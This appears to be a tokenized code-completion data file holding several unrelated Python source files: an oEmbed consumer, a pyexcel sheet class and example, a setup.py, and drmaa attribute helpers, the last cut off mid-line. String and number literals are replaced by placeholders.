<s> import logging <EOL> import requests <EOL> from pyembed . core import parse <EOL> from pyembed . core . error import PyEmbedError <EOL> try : <EOL> from urlparse import parse_qsl , urljoin , urlsplit , urlunsplit <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import parse_qsl , urljoin , urlsplit , urlunsplit , urlencode <EOL> class PyEmbedConsumerError ( PyEmbedError ) : <EOL> """<STR_LIT>""" <EOL> def get_first_oembed_response ( oembed_urls , max_width = None , max_height = None ) : <EOL> """<STR_LIT>""" <EOL> for oembed_url in oembed_urls : <EOL> try : <EOL> return get_oembed_response ( oembed_url , max_width = max_width , max_height = max_height ) <EOL> except PyEmbedError : <EOL> logging . warn ( '<STR_LIT>' % oembed_url , exc_info = True ) <EOL> raise PyEmbedConsumerError ( '<STR_LIT>' % oembed_urls ) <EOL> def get_oembed_response ( oembed_url , max_width = None , max_height = None ) : <EOL> """<STR_LIT>""" <EOL> response = requests . get ( __format_url ( oembed_url , max_width , max_height ) ) <EOL> if not response . ok : <EOL> raise PyEmbedConsumerError ( '<STR_LIT>' % ( <EOL> oembed_url , response . status_code ) ) <EOL> content_type = response . headers [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] <EOL> return parse . parse_oembed ( response . text , content_type ) <EOL> def __format_url ( oembed_url , max_width = None , max_height = None ) : <EOL> scheme , netloc , path , query_string , fragment = urlsplit ( oembed_url ) <EOL> query_params = parse_qsl ( query_string ) <EOL> if max_width is not None : <EOL> query_params . append ( ( '<STR_LIT>' , max_width ) ) <EOL> if max_height : <EOL> query_params . append ( ( '<STR_LIT>' , max_height ) ) <EOL> new_query_string = urlencode ( query_params , doseq = True ) <EOL> return urlunsplit ( ( scheme , netloc , path , new_query_string , fragment ) ) </s>
<s> import sys <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> and sys . version_info [ <NUM_LIT:1> ] < <NUM_LIT:7> : <EOL> from ordereddict import OrderedDict <EOL> else : <EOL> from collections import OrderedDict <EOL> if PY2 : <EOL> from StringIO import StringIO as BytesIO <EOL> else : <EOL> from io import BytesIO </s>
<s> """<STR_LIT>""" <EOL> import pyexcel as pe <EOL> import pyexcel . ext . xls <EOL> data = { <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , [ <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] ] , <EOL> "<STR_LIT>" : [ [ '<STR_LIT:X>' , '<STR_LIT:Y>' , '<STR_LIT>' ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] ] , <EOL> "<STR_LIT>" : [ [ '<STR_LIT:O>' , '<STR_LIT:P>' , '<STR_LIT>' ] , [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> ] ] <EOL> } <EOL> book = pe . Book ( data ) <EOL> book . save_as ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from texttable import Texttable <EOL> from . matrix import Row , Column , Matrix <EOL> from . formattablesheet import FormattableSheet <EOL> from . filterablesheet import FilterableSheet <EOL> from . . formatters import ( <EOL> ColumnFormatter , <EOL> RowFormatter , <EOL> NamedColumnFormatter , <EOL> NamedRowFormatter ) <EOL> from . . _compact import is_string , OrderedDict , PY2 , is_array_type <EOL> from . . filters import ColumnIndexFilter , RowIndexFilter <EOL> from . . iterators import ( <EOL> ColumnIndexIterator , <EOL> RowIndexIterator , <EOL> NamedRowIterator , <EOL> NamedColumnIterator <EOL> ) <EOL> from . . constants import MESSAGE_NOT_IMPLEMENTED_02 , MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED , DEFAULT_NAME <EOL> def names_to_indices ( names , series ) : <EOL> if isinstance ( names , str ) : <EOL> indices = series . index ( names ) <EOL> elif ( isinstance ( names , list ) and <EOL> isinstance ( names [ <NUM_LIT:0> ] , str ) ) : <EOL> indices = [ series . index ( astr ) for astr in names ] <EOL> else : <EOL> return names <EOL> return indices <EOL> def make_names_unique ( alist ) : <EOL> duplicates = { } <EOL> new_names = [ ] <EOL> for item in alist : <EOL> if item in duplicates : <EOL> duplicates [ item ] = duplicates [ item ] + <NUM_LIT:1> <EOL> new_names . append ( "<STR_LIT>" % ( item , duplicates [ item ] ) ) <EOL> else : <EOL> duplicates [ item ] = <NUM_LIT:0> <EOL> new_names . append ( str ( item ) ) <EOL> return new_names <EOL> class NamedRow ( Row ) : <EOL> """<STR_LIT>""" <EOL> def select ( self , names ) : <EOL> """<STR_LIT>""" <EOL> if is_array_type ( names , str ) : <EOL> indices = names_to_indices ( names , self . ref . rownames ) <EOL> Row . select ( self , indices ) <EOL> else : <EOL> Row . select ( self , names ) <EOL> def __delitem__ ( self , column_name ) : <EOL> """<STR_LIT>""" <EOL> if is_string ( type ( column_name ) ) : <EOL> self . ref . delete_named_row_at ( column_name ) <EOL> elif isinstance ( column_name , tuple ) and is_array_type ( list ( column_name ) , str ) : <EOL> indices = names_to_indices ( list ( column_name ) , self . ref . rownames ) <EOL> Row . __delitem__ ( self , indices ) <EOL> else : <EOL> Row . __delitem__ ( self , column_name ) <EOL> def __setitem__ ( self , str_or_aslice , c ) : <EOL> if is_string ( type ( str_or_aslice ) ) : <EOL> self . ref . set_named_row_at ( str_or_aslice , c ) <EOL> else : <EOL> Row . __setitem__ ( self , str_or_aslice , c ) <EOL> def __getitem__ ( self , str_or_aslice ) : <EOL> if is_string ( type ( str_or_aslice ) ) : <EOL> return self . ref . named_row_at ( str_or_aslice ) <EOL> else : <EOL> return Row . __getitem__ ( self , str_or_aslice ) <EOL> def __iadd__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , OrderedDict ) : <EOL> self . ref . extend_rows ( other ) <EOL> else : <EOL> Row . __iadd__ ( self , other ) <EOL> return self <EOL> def __add__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __iadd__ ( other ) <EOL> return self . ref <EOL> def format ( self , <EOL> row_index = None , formatter = None , <EOL> format_specs = None , on_demand = False ) : <EOL> """<STR_LIT>""" <EOL> def handle_one_formatter ( rows , theformatter , on_demand ) : <EOL> new_indices = rows <EOL> if len ( self . ref . rownames ) > <NUM_LIT:0> : <EOL> new_indices = names_to_indices ( rows , self . ref . rownames ) <EOL> aformatter = RowFormatter ( new_indices , theformatter ) <EOL> if on_demand : <EOL> self . ref . add_formatter ( aformatter ) <EOL> else : <EOL> self . ref . apply_formatter ( aformatter ) <EOL> if row_index is not None : <EOL> handle_one_formatter ( row_index , formatter , on_demand ) <EOL> elif format_specs : <EOL> for spec in format_specs : <EOL> if len ( spec ) == <NUM_LIT:3> : <EOL> handle_one_formatter ( spec [ <NUM_LIT:0> ] , spec [ <NUM_LIT:1> ] , <EOL> on_demand ) <EOL> else : <EOL> handle_one_formatter ( spec [ <NUM_LIT:0> ] , spec [ <NUM_LIT:1> ] , <EOL> on_demand ) <EOL> class NamedColumn ( Column ) : <EOL> """<STR_LIT>""" <EOL> def select ( self , names ) : <EOL> """<STR_LIT>""" <EOL> if is_array_type ( names , str ) : <EOL> indices = names_to_indices ( names , self . ref . colnames ) <EOL> Column . select ( self , indices ) <EOL> else : <EOL> Column . select ( self , names ) <EOL> def __delitem__ ( self , str_or_aslice ) : <EOL> """<STR_LIT>""" <EOL> if is_string ( type ( str_or_aslice ) ) : <EOL> self . ref . delete_named_column_at ( str_or_aslice ) <EOL> elif isinstance ( str_or_aslice , tuple ) and is_array_type ( list ( str_or_aslice ) , str ) : <EOL> indices = names_to_indices ( list ( str_or_aslice ) , self . ref . colnames ) <EOL> Column . __delitem__ ( self , indices ) <EOL> else : <EOL> Column . __delitem__ ( self , str_or_aslice ) <EOL> def __setitem__ ( self , str_or_aslice , c ) : <EOL> if is_string ( type ( str_or_aslice ) ) : <EOL> self . ref . set_named_column_at ( str_or_aslice , c ) <EOL> else : <EOL> Column . __setitem__ ( self , str_or_aslice , c ) <EOL> def __getitem__ ( self , str_or_aslice ) : <EOL> if is_string ( type ( str_or_aslice ) ) : <EOL> return self . ref . named_column_at ( str_or_aslice ) <EOL> else : <EOL> return Column . __getitem__ ( self , str_or_aslice ) <EOL> def __iadd__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , OrderedDict ) : <EOL> self . ref . extend_columns ( other ) <EOL> else : <EOL> Column . __iadd__ ( self , other ) <EOL> return self <EOL> def __add__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __iadd__ ( other ) <EOL> return self . ref <EOL> def format ( self , <EOL> column_index = None , formatter = None , <EOL> format_specs = None , on_demand = False ) : <EOL> """<STR_LIT>""" <EOL> def handle_one_formatter ( columns , aformatter , on_demand ) : <EOL> new_indices = columns <EOL> if len ( self . ref . colnames ) > <NUM_LIT:0> : <EOL> new_indices = names_to_indices ( columns , self . ref . colnames ) <EOL> theformatter = ColumnFormatter ( new_indices , aformatter ) <EOL> if on_demand : <EOL> self . ref . add_formatter ( theformatter ) <EOL> else : <EOL> self . ref . apply_formatter ( theformatter ) <EOL> if column_index is not None : <EOL> handle_one_formatter ( column_index , formatter , on_demand ) <EOL> elif format_specs : <EOL> for spec in format_specs : <EOL> if len ( spec ) == <NUM_LIT:3> : <EOL> handle_one_formatter ( spec [ <NUM_LIT:0> ] , spec [ <NUM_LIT:1> ] , <EOL> on_demand ) <EOL> else : <EOL> handle_one_formatter ( spec [ <NUM_LIT:0> ] , spec [ <NUM_LIT:1> ] , <EOL> on_demand ) <EOL> VALID_SHEET_PARAMETERS = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> class NominableSheet ( FilterableSheet ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sheet = None , name = DEFAULT_NAME , <EOL> name_columns_by_row = - <NUM_LIT:1> , <EOL> name_rows_by_column = - <NUM_LIT:1> , <EOL> colnames = None , <EOL> rownames = None , <EOL> transpose_before = False , <EOL> transpose_after = False ) : <EOL> """<STR_LIT>""" <EOL> if sheet is None : <EOL> sheet = [ ] <EOL> FilterableSheet . __init__ ( self , sheet ) <EOL> if transpose_before : <EOL> self . transpose ( ) <EOL> self . name = name <EOL> self . _column_names = [ ] <EOL> self . _row_names = [ ] <EOL> self . named_row = NamedRow ( self ) <EOL> self . named_column = NamedColumn ( self ) <EOL> if name_columns_by_row != - <NUM_LIT:1> : <EOL> if colnames : <EOL> raise NotImplementedError ( MESSAGE_NOT_IMPLEMENTED_02 ) <EOL> self . name_columns_by_row ( name_columns_by_row ) <EOL> else : <EOL> if colnames : <EOL> self . _column_names = colnames <EOL> if name_rows_by_column != - <NUM_LIT:1> : <EOL> if rownames : <EOL> raise NotImplementedError ( MESSAGE_NOT_IMPLEMENTED_02 ) <EOL> self . name_rows_by_column ( name_rows_by_column ) <EOL> else : <EOL> if rownames : <EOL> self . _row_names = rownames <EOL> if transpose_after : <EOL> self . transpose ( ) <EOL> @ property <EOL> def row ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . named_row <EOL> @ row . setter <EOL> def row ( self , value ) : <EOL> pass <EOL> @ property <EOL> def column ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . named_column <EOL> @ column . setter <EOL> def column ( self , value ) : <EOL> pass <EOL> def name_columns_by_row ( self , row_index ) : <EOL> """<STR_LIT>""" <EOL> self . row_index = row_index <EOL> self . _column_names = make_names_unique ( self . row_at ( row_index ) ) <EOL> del self . row [ row_index ] <EOL> def name_rows_by_column ( self , column_index ) : <EOL> """<STR_LIT>""" <EOL> self . column_index = column_index <EOL> self . _row_names = make_names_unique ( self . column_at ( column_index ) ) <EOL> del self . column [ column_index ] <EOL> @ property <EOL> def colnames ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . _filters ) != <NUM_LIT:0> : <EOL> column_filters = [ f for f in self . _filters <EOL> if isinstance ( f , ColumnIndexFilter ) ] <EOL> if len ( column_filters ) != <NUM_LIT:0> : <EOL> indices = range ( <NUM_LIT:0> , len ( self . _column_names ) ) <EOL> for f in column_filters : <EOL> indices = [ i for i in indices if i not in f . indices ] <EOL> return [ self . _column_names [ i ] for i in indices ] <EOL> else : <EOL> return self . _column_names <EOL> else : <EOL> return self . _column_names <EOL> @ colnames . setter <EOL> def colnames ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _column_names = make_names_unique ( value ) <EOL> @ property <EOL> def rownames ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . _filters ) != <NUM_LIT:0> : <EOL> row_filters = [ f for f in self . _filters <EOL> if isinstance ( f , RowIndexFilter ) ] <EOL> if len ( row_filters ) != <NUM_LIT:0> : <EOL> indices = range ( <NUM_LIT:0> , len ( self . _row_names ) ) <EOL> for f in row_filters : <EOL> indices = [ i for i in indices if i not in f . indices ] <EOL> return [ self . _row_names [ i ] for i in indices ] <EOL> else : <EOL> return self . _row_names <EOL> else : <EOL> return self . _row_names <EOL> @ rownames . setter <EOL> def rownames ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _row_names = make_names_unique ( value ) <EOL> def named_column_at ( self , name ) : <EOL> """<STR_LIT>""" <EOL> index = name <EOL> if is_string ( type ( index ) ) : <EOL> index = self . colnames . index ( name ) <EOL> column_array = self . column_at ( index ) <EOL> return column_array <EOL> def set_named_column_at ( self , name , column_array ) : <EOL> """<STR_LIT>""" <EOL> index = name <EOL> if is_string ( type ( index ) ) : <EOL> index = self . colnames . index ( name ) <EOL> self . set_column_at ( index , column_array ) <EOL> def delete_columns ( self , column_indices ) : <EOL> """<STR_LIT>""" <EOL> FilterableSheet . delete_columns ( self , column_indices ) <EOL> if len ( self . _column_names ) > <NUM_LIT:0> : <EOL> new_series = [ self . _column_names [ i ] <EOL> for i in range ( <NUM_LIT:0> , len ( self . _column_names ) ) <EOL> if i not in column_indices ] <EOL> self . _column_names = new_series <EOL> def delete_rows ( self , row_indices ) : <EOL> """<STR_LIT>""" <EOL> FilterableSheet . delete_rows ( self , row_indices ) <EOL> if len ( self . _row_names ) > <NUM_LIT:0> : <EOL> new_series = [ self . _row_names [ i ] <EOL> for i in range ( <NUM_LIT:0> , len ( self . _row_names ) ) <EOL> if i not in row_indices ] <EOL> self . _row_names = new_series <EOL> def delete_named_column_at ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , int ) : <EOL> if len ( self . rownames ) > <NUM_LIT:0> : <EOL> self . rownames . pop ( name ) <EOL> self . delete_columns ( [ name ] ) <EOL> else : <EOL> index = self . colnames . index ( name ) <EOL> self . colnames . pop ( index ) <EOL> FilterableSheet . delete_columns ( self , [ index ] ) <EOL> def named_row_at ( self , name ) : <EOL> """<STR_LIT>""" <EOL> index = name <EOL> index = self . rownames . index ( name ) <EOL> row_array = self . row_at ( index ) <EOL> return row_array <EOL> def set_named_row_at ( self , name , row_array ) : <EOL> """<STR_LIT>""" <EOL> index = name <EOL> if is_string ( type ( index ) ) : <EOL> index = self . rownames . index ( name ) <EOL> self . set_row_at ( index , row_array ) <EOL> def delete_named_row_at ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , int ) : <EOL> if len ( self . rownames ) > <NUM_LIT:0> : <EOL> self . rownames . pop ( name ) <EOL> self . delete_rows ( [ name ] ) <EOL> else : <EOL> index = self . rownames . index ( name ) <EOL> self . rownames . pop ( index ) <EOL> FilterableSheet . delete_rows ( self , [ index ] ) <EOL> def apply_formatter ( self , aformatter ) : <EOL> """<STR_LIT>""" <EOL> aformatter = self . _translate_named_formatter ( aformatter ) <EOL> FormattableSheet . apply_formatter ( self , aformatter ) <EOL> def _translate_named_formatter ( self , aformatter ) : <EOL> if isinstance ( aformatter , NamedColumnFormatter ) : <EOL> series = self . colnames <EOL> elif isinstance ( aformatter , NamedRowFormatter ) : <EOL> series = self . rownames <EOL> else : <EOL> series = None <EOL> if series : <EOL> indices = names_to_indices ( aformatter . indices , series ) <EOL> aformatter . update_index ( indices ) <EOL> return aformatter <EOL> def add_formatter ( self , aformatter ) : <EOL> """<STR_LIT>""" <EOL> aformatter = self . _translate_named_formatter ( aformatter ) <EOL> FormattableSheet . add_formatter ( self , aformatter ) <EOL> def extend_rows ( self , rows ) : <EOL> """<STR_LIT>""" <EOL> incoming_data = [ ] <EOL> if isinstance ( rows , OrderedDict ) : <EOL> keys = rows . keys ( ) <EOL> for k in keys : <EOL> self . rownames . append ( k ) <EOL> incoming_data . append ( rows [ k ] ) <EOL> FilterableSheet . extend_rows ( self , incoming_data ) <EOL> elif len ( self . rownames ) > <NUM_LIT:0> : <EOL> raise TypeError ( MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED ) <EOL> else : <EOL> FilterableSheet . extend_rows ( self , rows ) <EOL> def extend_columns_with_rows ( self , rows ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . colnames ) > <NUM_LIT:0> : <EOL> headers = rows . pop ( self . row_index ) <EOL> self . _column_names += headers <EOL> FilterableSheet . extend_columns_with_rows ( self , rows ) <EOL> def extend_columns ( self , columns ) : <EOL> """<STR_LIT>""" <EOL> incoming_data = [ ] <EOL> if isinstance ( columns , OrderedDict ) : <EOL> keys = columns . keys ( ) <EOL> for k in keys : <EOL> self . colnames . append ( k ) <EOL> incoming_data . append ( columns [ k ] ) <EOL> FilterableSheet . extend_columns ( self , incoming_data ) <EOL> elif len ( self . colnames ) > <NUM_LIT:0> : <EOL> raise TypeError ( MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED ) <EOL> else : <EOL> FilterableSheet . extend_columns ( self , columns ) <EOL> def __iter__ ( self ) : <EOL> if len ( self . _column_names ) > <NUM_LIT:0> : <EOL> return ColumnIndexIterator ( self ) <EOL> elif len ( self . _row_names ) > <NUM_LIT:0> : <EOL> return RowIndexIterator ( self ) <EOL> else : <EOL> return FilterableSheet . __iter__ ( self ) <EOL> def to_array ( self ) : <EOL> """<STR_LIT>""" <EOL> from . . utils import to_array <EOL> ret = [ ] <EOL> ret += to_array ( self . rows ( ) ) <EOL> if len ( self . rownames ) > <NUM_LIT:0> : <EOL> ret = map ( lambda value : [ value [ <NUM_LIT:0> ] ] + value [ <NUM_LIT:1> ] , <EOL> zip ( self . rownames , ret ) ) <EOL> if not PY2 : <EOL> ret = list ( ret ) <EOL> if len ( self . colnames ) > <NUM_LIT:0> : <EOL> if len ( self . rownames ) > <NUM_LIT:0> : <EOL> ret . insert ( <NUM_LIT:0> , [ "<STR_LIT>" ] + self . colnames ) <EOL> else : <EOL> ret . insert ( <NUM_LIT:0> , self . colnames ) <EOL> return ret <EOL> def to_records ( self , custom_headers = None ) : <EOL> """<STR_LIT>""" <EOL> from . . utils import to_records <EOL> return to_records ( self , custom_headers ) <EOL> def to_dict ( self , row = False ) : <EOL> """<STR_LIT>""" <EOL> from . . utils import to_dict <EOL> if row : <EOL> return to_dict ( RowIndexIterator ( self ) ) <EOL> else : <EOL> return to_dict ( ColumnIndexIterator ( self ) ) <EOL> def __getitem__ ( self , aset ) : <EOL> if isinstance ( aset , tuple ) : <EOL> if isinstance ( aset [ <NUM_LIT:0> ] , str ) : <EOL> row = self . rownames . index ( aset [ <NUM_LIT:0> ] ) <EOL> else : <EOL> row = aset [ <NUM_LIT:0> ] <EOL> if isinstance ( aset [ <NUM_LIT:1> ] , str ) : <EOL> column = self . colnames . index ( aset [ <NUM_LIT:1> ] ) <EOL> else : <EOL> column = aset [ <NUM_LIT:1> ] <EOL> return self . cell_value ( row , column ) <EOL> else : <EOL> return Matrix . __getitem__ ( self , aset ) <EOL> def __border__ ( self ) : <EOL> if len ( self . colnames ) > <NUM_LIT:0> : <EOL> return [ '<STR_LIT:->' , '<STR_LIT:|>' , '<STR_LIT:+>' , '<STR_LIT:=>' ] <EOL> else : <EOL> return [ '<STR_LIT:->' , '<STR_LIT:|>' , '<STR_LIT:+>' , '<STR_LIT:->' ] <EOL> def __str__ ( self ) : <EOL> from . . formatters import to_format <EOL> ret = "<STR_LIT>" % self . name <EOL> if len ( self . colnames ) > <NUM_LIT:0> : <EOL> table = Texttable ( max_width = <NUM_LIT:0> ) <EOL> table . set_chars ( self . __border__ ( ) ) <EOL> data = self . to_array ( ) <EOL> table . set_cols_dtype ( [ '<STR_LIT:t>' ] * len ( data [ <NUM_LIT:0> ] ) ) <EOL> new_data = [ ] <EOL> for sub_array in data : <EOL> new_array = [ ] <EOL> for item in sub_array : <EOL> if item == "<STR_LIT>" : <EOL> new_array . append ( "<STR_LIT:U+0020>" ) <EOL> else : <EOL> new_array . append ( to_format ( str , item ) ) <EOL> new_data . append ( new_array ) <EOL> table . add_rows ( new_data ) <EOL> return ret + table . draw ( ) <EOL> else : <EOL> return ret + FilterableSheet . __str__ ( self ) <EOL> def named_rows ( self ) : <EOL> return NamedRowIterator ( self ) <EOL> def named_columns ( self ) : <EOL> return NamedColumnIterator ( self ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from setuptools import setup , find_packages <EOL> except ImportError : <EOL> from ez_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> author = "<STR_LIT>" , <EOL> version = '<STR_LIT>' , <EOL> author_email = "<STR_LIT>" , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> long_description = __doc__ , <EOL> zip_safe = False , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import sys <EOL> from collections import namedtuple <EOL> from ctypes import ( byref , c_uint , create_string_buffer , POINTER , pointer , <EOL> sizeof ) <EOL> from drmaa . const import ATTR_BUFFER , ENCODING , NO_MORE_ELEMENTS <EOL> from drmaa . errors import error_buffer <EOL> from drmaa . wrappers import ( drmaa_attr_names_t , drmaa_attr_values_t , <EOL> drmaa_get_attribute , drmaa_get_attribute_names , <EOL> drmaa_get_next_attr_name , <EOL> drmaa_get_next_attr_value , <EOL> drmaa_get_next_job_id , drmaa_get_vector_attribute , <EOL> drmaa_get_vector_attribute_names , drmaa_job_ids_t , <EOL> drmaa_release_attr_names , <EOL> drmaa_release_attr_values , <EOL> drmaa_release_job_ids , drmaa_run_bulk_jobs , <EOL> drmaa_set_attribute , drmaa_set_vector_attribute , <EOL> drmaa_version , STRING ) <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> bytes = str <EOL> str = unicode <EOL> _BUFLEN = ATTR_BUFFER <EOL> class BoolConverter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , true = b'<STR_LIT:y>' , false = b'<STR_LIT:n>' ) : <EOL> if isinstance ( true , str ) : <EOL> true = true . encode ( ENCODING ) <EOL> self . true = true <EOL> if isinstance ( false , str ) : <EOL> false = false . encode ( ENCODING ) <EOL> self . false = false <EOL> def to_drmaa ( self , value ) : <EOL> if value : <EOL> return self . true <EOL> else : <EOL> return self . false <EOL> def from_drmaa ( self , value ) : <EOL> if value == self . true : <EOL> return True <EOL> else : <EOL> return False <EOL> class IntConverter ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def to_drmaa ( value ) : <EOL> return bytes ( value ) <EOL> @ staticmethod <EOL> def from_drmaa ( value ) : <EOL> return int ( value ) <EOL> class SessionStringAttribute ( object ) : <EOL> def __init__ ( self , drmaa_function ) : <EOL> self . _f = drmaa_function <EOL> def __get__ ( self , * args ) : <EOL> buf = create_string_buffer ( _BUFLEN ) <EOL> c ( self . _f , buf , sizeof ( buf ) ) <EOL> return buf . value . decode ( ) <EOL> Version = namedtuple ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> Version . __str__ = lambda x : "<STR_LIT>" . format ( x . major , <EOL> x . minor ) . encode ( ENCODING ) <EOL> else : <EOL> Version . __str__ = lambda x : "<STR_LIT>" . format ( x . major , x . minor ) <EOL> class SessionVersionAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __get__ ( self , * args ) : <EOL> major = c_uint ( <NUM_LIT:10> ) <EOL> minor = c_uint ( <NUM_LIT:10> ) <EOL> c ( drmaa_version , byref ( major ) , byref ( minor ) ) <EOL> return Version ( major . value , minor . value ) <EOL> class Attribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , type_converter = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , str ) : <EOL> name = name . encode ( ENCODING ) <EOL> self . name = name <EOL> self . converter = type_converter <EOL> def __set__ ( self , instance , value ) : <EOL> if self . converter : <EOL> v = self . converter . to_drmaa ( value ) <EOL> elif isinstance ( value , str ) : <EOL> v = value . encode ( ENCODING ) <EOL> else : <EOL> v = value <EOL> c ( drmaa_set_attribute , instance , self . name , v ) <EOL> def __get__ ( self , instance , _ ) : <EOL> attr_buffer = create_string_buffer ( ATTR_BUFFER ) <EOL> c ( drmaa_get_attribute , instance , self . name , attr_buffer , <EOL> sizeof ( attr_buffer ) ) <EOL> if self . converter : <EOL> return self . converter . from_drmaa ( attr_buffer . value ) <EOL> elif isinstance ( attr_buffer . value , bytes ) : <EOL> return attr_buffer . value . decode ( ) <EOL> else : <EOL> return attr_buffer . value <EOL> class VectorAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> if isinstance ( name , str ) : <EOL> name = name . encode ( ENCODING ) <EOL> self . name = name <EOL> def __set__ ( self , instance , value ) : <EOL> c ( drmaa_set_vector_attribute , instance , <EOL> self . name , string_vector ( value ) ) <EOL> def __get__ ( self , instance , _ ) : <EOL> return list ( vector_attribute_iterator ( instance , self . name ) ) <EOL> class DictAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> if isinstance ( name , str ) : <EOL> name = name . encode ( ENCODING ) <EOL> self . name = name <EOL> def __set__ ( self , instance , value ) : <EOL> vector = [ ] <EOL> for k , v in value . items ( ) : <EOL> if isinstance ( k , bytes ) : <EOL> k = k . decode ( ENCODING ) <EOL> if isinstance ( v , bytes ) : <EOL> v = v . decode ( ENCODING ) <EOL> vector . append ( "<STR_LIT>" . format ( k , v ) . encode ( ENCODING ) ) <EOL> c ( drmaa_set_vector_attribute , instance , self . name , <EOL> string_vector ( vector ) ) <EOL> def __get__ ( self , instance , _ ) : <EOL> x = [ i . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for i in <EOL> list ( vector_attribute_iterator ( instance , self . name ) ) ] <EOL> return dict ( x ) <EOL> def attributes_iterator ( attributes ) : <EOL> try : <EOL> buf = create_string_buffer ( ATTR_BUFFER ) <EOL> while drmaa_get_next_attr_value ( attributes , buf , <EOL> sizeof ( buf ) ) != NO_MORE_ELEMENTS : <EOL> yield buf . value . decode ( ) <EOL> except : <EOL> drmaa_release_attr_values ( attributes ) <EOL> raise <EOL> else : <EOL> drmaa_release_attr_values ( attributes ) <EOL> def adapt_rusage ( rusage ) : <EOL> """<STR_LIT>""" <EOL> rv = dict ( ) <EOL> for attr in attributes_iterator ( rusage . contents ) : <EOL> k , v = attr . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> rv [ k ] = v <EOL> return rv <EOL> def vector_attribute_iterator ( jt , attr_name ) : <EOL> avalues = pointer ( POINTER ( drmaa_attr_values_t ) ( ) ) <EOL> c ( drmaa_get_vector_attribute , jt , attr_name , avalues ) <EOL> return attributes_iterator ( avalues . contents ) <EOL> def attribute_names_iterator ( ) : <EOL> attrn_p = pointer ( POINTER ( drmaa_attr_names_t ) ( ) ) <EOL> c ( drmaa_get_attribute_names , attrn_p ) <EOL> try : <EOL> name = create_string_buffer ( _BUFLEN ) <EOL> while drmaa_get_next_attr_name ( attrn_p . contents , name , <EOL> _BUFLEN ) != NO_MORE_ELEMENTS : <EOL> yield name . value . decode ( ) <EOL> except : <EOL> drmaa_release_attr_names ( attrn_p . contents ) <EOL> raise <EOL> else : <EOL> drmaa_release_attr_names ( attrn_p . contents ) <EOL> def vector_attribute_names_iterator ( ) : <EOL> attrn_p = pointer ( POINTER ( drmaa_attr_names_t ) ( ) ) <EOL> c ( drmaa_get_vector_attribute_names , attrn_p ) <EOL> try : <EOL> name = create_string_buffer ( _BUFLEN ) <EOL> while drmaa_get_next_attr_name ( attrn_p . contents , name , <EOL> _BUFLEN ) != NO_MORE_ELEMENTS : <EOL> yield name . value . decode ( ) <EOL> except : <EOL> drmaa_release_attr_names ( attrn_p . contents ) <EOL> raise <EOL> else : <EOL> drmaa_release_attr_names ( attrn_p . contents ) <EOL> def run_bulk_job ( jt , start , end , incr = <NUM_LIT:1> ) : <EOL> jids = pointer ( POINTER ( drmaa_job_ids_t ) ( ) ) <EOL> try : <EOL> c ( drmaa_run_bulk_jobs , jids , jt , start , end , incr ) <EOL> jid = create_string_buffer ( _BUFLEN ) <EOL> while drmaa_get_next_job_id ( jids . contents , jid , 